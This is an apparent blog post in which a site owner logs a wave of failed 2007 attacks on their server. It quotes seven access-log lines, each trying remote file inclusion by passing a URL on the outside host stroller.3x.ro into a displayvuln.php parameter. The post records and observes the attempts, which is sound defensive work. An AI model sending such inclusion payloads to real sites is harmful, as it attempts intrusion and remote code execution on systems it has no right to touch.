The Script kiddie attacks have returned yet again. The current attempts try to use a Mambo exploit from 2004, possibly a vulnerability in an old version of MIG (My Image Gallery)

219.117.254.100 - - [19/Jun/2007:14:14:23 +0100] “GET /displayvuln.php?osvdb_id=http://stroller.3x.ro/echo.txt? HTTP/1.1″ 404 995 “-” “libwww-perl/5.79″
202.189.148.82 - - [19/Jun/2007:14:22:21 +0100] “GET /displayvuln.php?osvdb_id=http://stroller.3x.ro/echo.txt? HTTP/1.1″ 404 995 “-” “libwww-perl/5.65″
62.217.52.10 - - [19/Jun/2007:14:24:02 +0100] “GET /displayvuln.php?osvdb_id=http://stroller.3x.ro/echo.txt? HTTP/1.1″ 404 995 “-” “libwww-perl/5.65″
200.80.59.132 - - [19/Jun/2007:14:32:54 +0100] “GET /displayvuln.php?osvdb_id=http://stroller.3x.ro/echo.txt? HTTP/1.1″ 404 995 “-” “libwww-perl/5.800″
200.30.142.102 - - [19/Jun/2007:14:39:06 +0100] “GET /displayvuln.php?osvdb_id=http://stroller.3x.ro/echo.txt? HTTP/1.1″ 404 995 “-” “libwww-perl/5.803″
202.67.226.224 - - [19/Jun/2007:14:57:38 +0100] “GET /displayvuln.php?osvdb_id=http://stroller.3x.ro/echo.txt? HTTP/1.1″ 404 995 “-” “libwww-perl/5.79″
72.55.133.231 - - [19/Jun/2007:16:45:56 +0100] “GET /displayvuln.php?osvdb_id=http://stroller.3x.ro/echo.txt? HTTP/1.1″ 404 995 “-” “libwww-perl/5.803″


I saw a couple of entries in the logs that looked like similar attempts to deface the site as seen in the article, script kiddies 2, however they seem either different, or more sophisticated. More »